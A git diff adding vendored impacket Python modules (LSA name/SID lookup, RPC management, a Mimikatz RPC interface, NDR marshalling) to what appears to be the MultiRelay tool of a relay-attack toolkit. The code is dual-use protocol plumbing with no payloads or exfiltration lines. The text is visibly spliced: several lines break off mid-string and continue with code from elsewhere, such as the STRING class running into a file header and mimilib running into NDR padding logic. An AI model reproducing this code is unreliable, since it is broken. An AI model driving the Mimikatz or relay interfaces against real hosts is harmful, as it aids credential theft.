+LSA_TLN_DISABLED_ADMIN = 0x00000002
+LSA_TLN_DISABLED_CONFLICT = 0x00000004
+LSA_SID_DISABLED_ADMIN = 0x00000001
+LSA_SID_DISABLED_CONFLICT = 0x00000002
+LSA_NB_DISABLED_ADMIN = 0x00000004
+LSA_NB_DISABLED_CONFLICT = 0x00000008
+LSA_FTRECORD_DISABLED_REASONS = 0x0000FFFF
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1 LSAPR_HANDLE
+class LSAPR_HANDLE(NDRSTRUCT):
+ align = 1
+ structure = (
+ ('Data','20s=""'),
+ )
+
+# 2.2.2.3 LSA_UNICODE_STRING
+LSA_UNICODE_STRING = RPC_UNICODE_STRING
+
+# 2.2.3.1 STRING
+class STRING(NDRSTRUCT):
+ commonHdr = (
+ ('MaximumLength','.
+# There are test cases for them too.
+#
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import ULONG, LONG, PRPC_SID, RPC_UNICODE_STRING, LPWSTR, PRPC_UNICODE_STRING, NTSTATUS, \
+ NULL
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.lsad import LSAPR_HANDLE, PLSAPR_TRUST_INFORMATION_ARRAY
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.samr import SID_NAME_USE
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_LSAT = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'LSAT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'LSAT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.10 ACCESS_MASK
+POLICY_LOOKUP_NAMES = 0x00000800
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.12 LSAPR_REFERENCED_DOMAIN_LIST
+class LSAPR_REFERENCED_DOMAIN_LIST(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('Domains', PLSAPR_TRUST_INFORMATION_ARRAY),
+ ('MaxEntries', ULONG),
+ )
+
+class PLSAPR_REFERENCED_DOMAIN_LIST(NDRPOINTER):
+ referent = (
+ ('Data', LSAPR_REFERENCED_DOMAIN_LIST),
+ )
+
+# 2.2.14 LSA_TRANSLATED_SID
+class LSA_TRANSLATED_SID(NDRSTRUCT):
+ structure = (
+ ('Use', SID_NAME_USE),
+ ('RelativeId', ULONG),
+ ('DomainIndex', LONG),
+ )
+
+# 2.2.15 LSAPR_TRANSLATED_SIDS
+class LSA_TRANSLATED_SID_ARRAY(NDRUniConformantArray):
+ item = LSA_TRANSLATED_SID
+
+class PLSA_TRANSLATED_SID_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', LSA_TRANSLATED_SID_ARRAY),
+ )
+
+class LSAPR_TRANSLATED_SIDS(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('Sids', PLSA_TRANSLATED_SID_ARRAY),
+ )
+
+# 2.2.16 LSAP_LOOKUP_LEVEL
+class LSAP_LOOKUP_LEVEL(NDRENUM):
+ class enumItems(Enum):
+ LsapLookupWksta = 1
+ LsapLookupPDC = 2
+ LsapLookupTDL = 3
+ LsapLookupGC = 4
+ LsapLookupXForestReferral = 5
+ LsapLookupXForestResolve = 6
+ LsapLookupRODCReferralToFullDC = 7
+
+# 2.2.17 LSAPR_SID_INFORMATION
+class LSAPR_SID_INFORMATION(NDRSTRUCT):
+ structure = (
+ ('Sid', PRPC_SID),
+ )
+
+# 2.2.18 LSAPR_SID_ENUM_BUFFER
+class LSAPR_SID_INFORMATION_ARRAY(NDRUniConformantArray):
+ item = LSAPR_SID_INFORMATION
+
+class PLSAPR_SID_INFORMATION_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', LSAPR_SID_INFORMATION_ARRAY),
+ )
+
+class LSAPR_SID_ENUM_BUFFER(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('SidInfo', PLSAPR_SID_INFORMATION_ARRAY),
+ )
+
+# 2.2.19 LSAPR_TRANSLATED_NAME
+class LSAPR_TRANSLATED_NAME(NDRSTRUCT):
+ structure = (
+ ('Use', SID_NAME_USE),
+ ('Name', RPC_UNICODE_STRING),
+ ('DomainIndex', LONG),
+ )
+
+# 2.2.20 LSAPR_TRANSLATED_NAMES
+class LSAPR_TRANSLATED_NAME_ARRAY(NDRUniConformantArray):
+ item = LSAPR_TRANSLATED_NAME
+
+class PLSAPR_TRANSLATED_NAME_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', LSAPR_TRANSLATED_NAME_ARRAY),
+ )
+
+class LSAPR_TRANSLATED_NAMES(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('Names', PLSAPR_TRANSLATED_NAME_ARRAY),
+ )
+
+# 2.2.21 LSAPR_TRANSLATED_NAME_EX
+class LSAPR_TRANSLATED_NAME_EX(NDRSTRUCT):
+ structure = (
+ ('Use', SID_NAME_USE),
+ ('Name', RPC_UNICODE_STRING),
+ ('DomainIndex', LONG),
+ ('Flags', ULONG),
+ )
+
+# 2.2.22 LSAPR_TRANSLATED_NAMES_EX
+class LSAPR_TRANSLATED_NAME_EX_ARRAY(NDRUniConformantArray):
+ item = LSAPR_TRANSLATED_NAME_EX
+
+class PLSAPR_TRANSLATED_NAME_EX_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', LSAPR_TRANSLATED_NAME_EX_ARRAY),
+ )
+
+class LSAPR_TRANSLATED_NAMES_EX(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('Names', PLSAPR_TRANSLATED_NAME_EX_ARRAY),
+ )
+
+# 2.2.23 LSAPR_TRANSLATED_SID_EX
+class LSAPR_TRANSLATED_SID_EX(NDRSTRUCT):
+ structure = (
+ ('Use', SID_NAME_USE),
+ ('RelativeId', ULONG),
+ ('DomainIndex', LONG),
+ ('Flags', ULONG),
+ )
+
+# 2.2.24 LSAPR_TRANSLATED_SIDS_EX
+class LSAPR_TRANSLATED_SID_EX_ARRAY(NDRUniConformantArray):
+ item = LSAPR_TRANSLATED_SID_EX
+
+class PLSAPR_TRANSLATED_SID_EX_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', LSAPR_TRANSLATED_SID_EX_ARRAY),
+ )
+
+class LSAPR_TRANSLATED_SIDS_EX(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('Sids', PLSAPR_TRANSLATED_SID_EX_ARRAY),
+ )
+
+# 2.2.25 LSAPR_TRANSLATED_SID_EX2
+class LSAPR_TRANSLATED_SID_EX2(NDRSTRUCT):
+ structure = (
+ ('Use', SID_NAME_USE),
+ ('Sid', PRPC_SID),
+ ('DomainIndex', LONG),
+ ('Flags', ULONG),
+ )
+
+# 2.2.26 LSAPR_TRANSLATED_SIDS_EX2
+class LSAPR_TRANSLATED_SID_EX2_ARRAY(NDRUniConformantArray):
+ item = LSAPR_TRANSLATED_SID_EX2
+
+class PLSAPR_TRANSLATED_SID_EX2_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', LSAPR_TRANSLATED_SID_EX2_ARRAY),
+ )
+
+class LSAPR_TRANSLATED_SIDS_EX2(NDRSTRUCT):
+ structure = (
+ ('Entries', ULONG),
+ ('Sids', PLSAPR_TRANSLATED_SID_EX2_ARRAY),
+ )
+
+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
+ item = RPC_UNICODE_STRING
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.4 LsarGetUserName (Opnum 45)
+class LsarGetUserName(NDRCALL):
+ opnum = 45
+ structure = (
+ ('SystemName', LPWSTR),
+ ('UserName', PRPC_UNICODE_STRING),
+ ('DomainName', PRPC_UNICODE_STRING),
+ )
+
+class LsarGetUserNameResponse(NDRCALL):
+ structure = (
+ ('UserName', PRPC_UNICODE_STRING),
+ ('DomainName', PRPC_UNICODE_STRING),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.5 LsarLookupNames4 (Opnum 77)
+class LsarLookupNames4(NDRCALL):
+ opnum = 77
+ structure = (
+ ('Count', ULONG),
+ ('Names', RPC_UNICODE_STRING_ARRAY),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ ('LookupOptions', ULONG),
+ ('ClientRevision', ULONG),
+ )
+
+class LsarLookupNames4Response(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.6 LsarLookupNames3 (Opnum 68)
+class LsarLookupNames3(NDRCALL):
+ opnum = 68
+ structure = (
+ ('PolicyHandle', LSAPR_HANDLE),
+ ('Count', ULONG),
+ ('Names', RPC_UNICODE_STRING_ARRAY),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ ('LookupOptions', ULONG),
+ ('ClientRevision', ULONG),
+ )
+
+class LsarLookupNames3Response(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.7 LsarLookupNames2 (Opnum 58)
+class LsarLookupNames2(NDRCALL):
+ opnum = 58
+ structure = (
+ ('PolicyHandle', LSAPR_HANDLE),
+ ('Count', ULONG),
+ ('Names', RPC_UNICODE_STRING_ARRAY),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ ('LookupOptions', ULONG),
+ ('ClientRevision', ULONG),
+ )
+
+class LsarLookupNames2Response(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.8 LsarLookupNames (Opnum 14)
+class LsarLookupNames(NDRCALL):
+ opnum = 14
+ structure = (
+ ('PolicyHandle', LSAPR_HANDLE),
+ ('Count', ULONG),
+ ('Names', RPC_UNICODE_STRING_ARRAY),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ )
+
+class LsarLookupNamesResponse(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.9 LsarLookupSids3 (Opnum 76)
+class LsarLookupSids3(NDRCALL):
+ opnum = 76
+ structure = (
+ ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+ ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ ('LookupOptions', ULONG),
+ ('ClientRevision', ULONG),
+ )
+
+class LsarLookupSids3Response(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.10 LsarLookupSids2 (Opnum 57)
+class LsarLookupSids2(NDRCALL):
+ opnum = 57
+ structure = (
+ ('PolicyHandle', LSAPR_HANDLE),
+ ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+ ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ ('LookupOptions', ULONG),
+ ('ClientRevision', ULONG),
+ )
+
+class LsarLookupSids2Response(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+# 3.1.4.11 LsarLookupSids (Opnum 15)
+class LsarLookupSids(NDRCALL):
+ opnum = 15
+ structure = (
+ ('PolicyHandle', LSAPR_HANDLE),
+ ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+ ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+ ('LookupLevel', LSAP_LOOKUP_LEVEL),
+ ('MappedCount', ULONG),
+ )
+
+class LsarLookupSidsResponse(NDRCALL):
+ structure = (
+ ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+ ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+ ('MappedCount', ULONG),
+ ('ErrorCode', NTSTATUS),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 14 : (LsarLookupNames, LsarLookupNamesResponse),
+ 15 : (LsarLookupSids, LsarLookupSidsResponse),
+ 45 : (LsarGetUserName, LsarGetUserNameResponse),
+ 57 : (LsarLookupSids2, LsarLookupSids2Response),
+ 58 : (LsarLookupNames2, LsarLookupNames2Response),
+ 68 : (LsarLookupNames3, LsarLookupNames3Response),
+ 76 : (LsarLookupSids3, LsarLookupSids3Response),
+ 77 : (LsarLookupNames4, LsarLookupNames4Response),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hLsarGetUserName(dce, userName = NULL, domainName = NULL):
+ request = LsarGetUserName()
+ request['SystemName'] = NULL
+ request['UserName'] = userName
+ request['DomainName'] = domainName
+ return dce.request(request)
+
+def hLsarLookupNames4(dce, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+ request = LsarLookupNames4()
+ request['Count'] = len(names)
+ for name in names:
+ itemn = RPC_UNICODE_STRING()
+ itemn['Data'] = name
+ request['Names'].append(itemn)
+ request['TranslatedSids']['Sids'] = NULL
+ request['LookupLevel'] = lookupLevel
+ request['LookupOptions'] = lookupOptions
+ request['ClientRevision'] = clientRevision
+
+ return dce.request(request)
+
+def hLsarLookupNames3(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+ request = LsarLookupNames3()
+ request['PolicyHandle'] = policyHandle
+ request['Count'] = len(names)
+ for name in names:
+ itemn = RPC_UNICODE_STRING()
+ itemn['Data'] = name
+ request['Names'].append(itemn)
+ request['TranslatedSids']['Sids'] = NULL
+ request['LookupLevel'] = lookupLevel
+ request['LookupOptions'] = lookupOptions
+ request['ClientRevision'] = clientRevision
+
+ return dce.request(request)
+
+def hLsarLookupNames2(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+ request = LsarLookupNames2()
+ request['PolicyHandle'] = policyHandle
+ request['Count'] = len(names)
+ for name in names:
+ itemn = RPC_UNICODE_STRING()
+ itemn['Data'] = name
+ request['Names'].append(itemn)
+ request['TranslatedSids']['Sids'] = NULL
+ request['LookupLevel'] = lookupLevel
+ request['LookupOptions'] = lookupOptions
+ request['ClientRevision'] = clientRevision
+
+ return dce.request(request)
+
+def hLsarLookupNames(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+ request = LsarLookupNames()
+ request['PolicyHandle'] = policyHandle
+ request['Count'] = len(names)
+ for name in names:
+ itemn = RPC_UNICODE_STRING()
+ itemn['Data'] = name
+ request['Names'].append(itemn)
+ request['TranslatedSids']['Sids'] = NULL
+ request['LookupLevel'] = lookupLevel
+
+ return dce.request(request)
+
+def hLsarLookupSids2(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+ request = LsarLookupSids2()
+ request['PolicyHandle'] = policyHandle
+ request['SidEnumBuffer']['Entries'] = len(sids)
+ for sid in sids:
+ itemn = LSAPR_SID_INFORMATION()
+ itemn['Sid'].fromCanonical(sid)
+ request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+ request['TranslatedNames']['Names'] = NULL
+ request['LookupLevel'] = lookupLevel
+ request['LookupOptions'] = lookupOptions
+ request['ClientRevision'] = clientRevision
+
+ return dce.request(request)
+
+def hLsarLookupSids(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+ request = LsarLookupSids()
+ request['PolicyHandle'] = policyHandle
+ request['SidEnumBuffer']['Entries'] = len(sids)
+ for sid in sids:
+ itemn = LSAPR_SID_INFORMATION()
+ itemn['Sid'].fromCanonical(sid)
+ request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+ request['TranslatedNames']['Names'] = NULL
+ request['LookupLevel'] = lookupLevel
+
+ return dce.request(request)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py
new file mode 100644
index 0000000..b419c11
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py
@@ -0,0 +1,166 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [C706] Remote Management Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUniConformantVaryingArray
+from impacket.dcerpc.v5.epm import PRPC_IF_ID
+from impacket.dcerpc.v5.dtypes import ULONG, DWORD_ARRAY, ULONGLONG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket import nt_errors
+
+MSRPC_UUID_MGMT = uuidtup_to_bin(('afa8bd80-7d8a-11c9-bef4-08002b102989','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'MGMT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'MGMT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+class rpc_if_id_p_t_array(NDRUniConformantArray):
+ item = PRPC_IF_ID
+
+class rpc_if_id_vector_t(NDRSTRUCT):
+ structure = (
+ ('count',ULONG),
+ ('if_id',rpc_if_id_p_t_array),
+ )
+ structure64 = (
+ ('count',ULONGLONG),
+ ('if_id',rpc_if_id_p_t_array),
+ )
+
+class rpc_if_id_vector_p_t(NDRPOINTER):
+ referent = (
+ ('Data', rpc_if_id_vector_t),
+ )
+
+error_status = ULONG
+################################################################################
+# STRUCTURES
+################################################################################
+
+################################################################################
+# RPC CALLS
+################################################################################
+class inq_if_ids(NDRCALL):
+ opnum = 0
+ structure = (
+ )
+
+class inq_if_idsResponse(NDRCALL):
+ structure = (
+ ('if_id_vector', rpc_if_id_vector_p_t),
+ ('status', error_status),
+ )
+
+class inq_stats(NDRCALL):
+ opnum = 1
+ structure = (
+ ('count', ULONG),
+ )
+
+class inq_statsResponse(NDRCALL):
+ structure = (
+ ('count', ULONG),
+ ('statistics', DWORD_ARRAY),
+ ('status', error_status),
+ )
+
+class is_server_listening(NDRCALL):
+ opnum = 2
+ structure = (
+ )
+
+class is_server_listeningResponse(NDRCALL):
+ structure = (
+ ('status', error_status),
+ )
+
+class stop_server_listening(NDRCALL):
+ opnum = 3
+ structure = (
+ )
+
+class stop_server_listeningResponse(NDRCALL):
+ structure = (
+ ('status', error_status),
+ )
+
+class inq_princ_name(NDRCALL):
+ opnum = 4
+ structure = (
+ ('authn_proto', ULONG),
+ ('princ_name_size', ULONG),
+ )
+
+class inq_princ_nameResponse(NDRCALL):
+ structure = (
+ ('princ_name', NDRUniConformantVaryingArray),
+ ('status', error_status),
+ )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (inq_if_ids, inq_if_idsResponse),
+ 1 : (inq_stats, inq_statsResponse),
+ 2 : (is_server_listening, is_server_listeningResponse),
+ 3 : (stop_server_listening, stop_server_listeningResponse),
+ 4 : (inq_princ_name, inq_princ_nameResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hinq_if_ids(dce):
+ request = inq_if_ids()
+ return dce.request(request)
+
+def hinq_stats(dce, count = 4):
+ request = inq_stats()
+ request['count'] = count
+ return dce.request(request)
+
+def his_server_listening(dce):
+ request = is_server_listening()
+ return dce.request(request, checkError=False)
+
+def hstop_server_listening(dce):
+ request = stop_server_listening()
+ return dce.request(request)
+
+def hinq_princ_name(dce, authn_proto=0, princ_name_size=1):
+ request = inq_princ_name()
+ request['authn_proto'] = authn_proto
+ request['princ_name_size'] = princ_name_size
+ return dce.request(request, checkError=False)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py
new file mode 100644
index 0000000..fdcdb8b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py
@@ -0,0 +1,236 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# Mimikatz Interface implementation, based on @gentilkiwi IDL
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+import binascii
+import random
+
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import DWORD, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_MIMIKATZ = uuidtup_to_bin(('17FC11E9-C258-4B8D-8D07-2F4125156244', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'Mimikatz SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'Mimikatz SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+CALG_DH_EPHEM = 0x0000aa02
+TPUBLICKEYBLOB = 0x6
+CUR_BLOB_VERSION = 0x2
+ALG_ID = DWORD
+CALG_RC4 = 0x6801
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUBLICKEYSTRUC(Structure):
+ structure = (
+ ('bType','B=0'),
+ ('bVersion','B=0'),
+ ('reserved',' 0:
+ pad = (alignment - (soFar % alignment)) % alignment
+ else:
+ pad = 0
+
+ return pad
+
+ def getData(self, soFar = 0):
+ data = b''
+ for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:
+ try:
+ # Alignment of Primitive Types
+
+ # NDR enforces NDR alignment of primitive data; that is, any primitive of size n
+ # octets is aligned at a octet stream index that is a multiple of n.
+ # (In this version of NDR, n is one of {1, 2, 4, 8}.) An octet stream index indicates
+ # the number of an octet in an octet stream when octets are numbered, beginning with 0,
+ # from the first octet in the stream. Where necessary, an alignment gap, consisting of
+ # octets of unspecified value, precedes the representation of a primitive. The gap is
+ # of the smallest size sufficient to align the primitive.
+ pad = self.calculatePad(fieldTypeOrClass, soFar)
+ if pad > 0:
+ soFar += pad
+ data += b'\xbf'*pad
+
+ res = self.pack(fieldName, fieldTypeOrClass, soFar)
+
+ data += res
+ soFar += len(res)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ return data
+
+ def fromString(self, data, offset=0):
+ offset0 = offset
+ for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:
+ try:
+ # Alignment of Primitive Types
+
+ # NDR enforces NDR alignment of primitive data; that is, any primitive of size n
+ # octets is aligned at a octet stream index that is a multiple of n.
+ # (In this version of NDR, n is one of {1, 2, 4, 8}.) An octet stream index indicates
+ # the number of an octet in an octet stream when octets are numbered, beginning with 0,
+ # from the first octet in the stream. Where necessary, an alignment gap, consisting of
+ # octets of unspecified value, precedes the representation of a primitive. The gap is
+ # of the smallest size sufficient to align the primitive.
+ offset += self.calculatePad(fieldTypeOrClass, offset)
+
+ offset += self.unpack(fieldName, fieldTypeOrClass, data, offset)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error unpacking field '%s | %s | %r'" % (fieldName, fieldTypeOrClass, data[offset:offset+256]))
+ raise
+ return offset - offset0
+
+ def pack(self, fieldName, fieldTypeOrClass, soFar = 0):
+ if isinstance(self.fields[fieldName], NDR):
+ return self.fields[fieldName].getData(soFar)
+
+ data = self.fields[fieldName]
+ # void specifier
+ if fieldTypeOrClass[:1] == '_':
+ return b''
+
+ # code specifier
+ two = fieldTypeOrClass.split('=')
+ if len(two) >= 2:
+ try:
+ return self.pack(fieldName, two[0], soFar)
+ except:
+ self.fields[fieldName] = eval(two[1], {}, self.fields)
+ return self.pack(fieldName, two[0], soFar)
+
+ if data is None:
+ raise Exception('Trying to pack None')
+
+ # literal specifier
+ if fieldTypeOrClass[:1] == ':':
+ if hasattr(data, 'getData'):
+ return data.getData()
+ return data
+
+ # struct like specifier
+ return pack(fieldTypeOrClass, data)
+
+ def unpack(self, fieldName, fieldTypeOrClass, data, offset=0):
+ if isinstance(self.fields[fieldName], NDR):
+ return self.fields[fieldName].fromString(data, offset)
+
+ # code specifier
+ two = fieldTypeOrClass.split('=')
+ if len(two) >= 2:
+ return self.unpack(fieldName, two[0], data, offset)
+
+ # literal specifier
+ if fieldTypeOrClass == ':':
+ if isinstance(fieldTypeOrClass, NDR):
+ return self.fields[fieldName].fromString(data, offset)
+ else:
+ dataLen = self.getDataLen(data, offset)
+ self.fields[fieldName] = data[offset:offset+dataLen]
+ return dataLen
+
+ # struct like specifier
+ self.fields[fieldName] = unpack_from(fieldTypeOrClass, data, offset)[0]
+
+ return calcsize(fieldTypeOrClass)
+
+ def calcPackSize(self, fieldTypeOrClass, data):
+ if isinstance(fieldTypeOrClass, str) is False:
+ return len(data)
+
+ # code specifier
+ two = fieldTypeOrClass.split('=')
+ if len(two) >= 2:
+ return self.calcPackSize(two[0], data)
+
+ # literal specifier
+ if fieldTypeOrClass[:1] == ':':
+ return len(data)
+
+ # struct like specifier
+ return calcsize(fieldTypeOrClass)
+
+ def calcUnPackSize(self, fieldTypeOrClass, data, offset=0):
+ if isinstance(fieldTypeOrClass, str) is False:
+ return len(data) - offset
+
+ # code specifier
+ two = fieldTypeOrClass.split('=')
+ if len(two) >= 2:
+ return self.calcUnPackSize(two[0], data, offset)
+
+ # array specifier
+ two = fieldTypeOrClass.split('*')
+ if len(two) == 2:
+ return len(data) - offset
+
+ # literal specifier
+ if fieldTypeOrClass[:1] == ':':
+ return len(data) - offset
+
+ # struct like specifier
+ return calcsize(fieldTypeOrClass)
+
+# NDR Primitives
+class NDRSMALL(NDR):
+ align = 1
+ structure = (
+ ('Data', 'b=0'),
+ )
+
+class NDRUSMALL(NDR):
+ align = 1
+ structure = (
+ ('Data', 'B=0'),
+ )
+
+class NDRBOOLEAN(NDRSMALL):
+ def dump(self, msg = None, indent = 0):
+ if msg is None:
+ msg = self.__class__.__name__
+ if msg != '':
+ print(msg, end=' ')
+
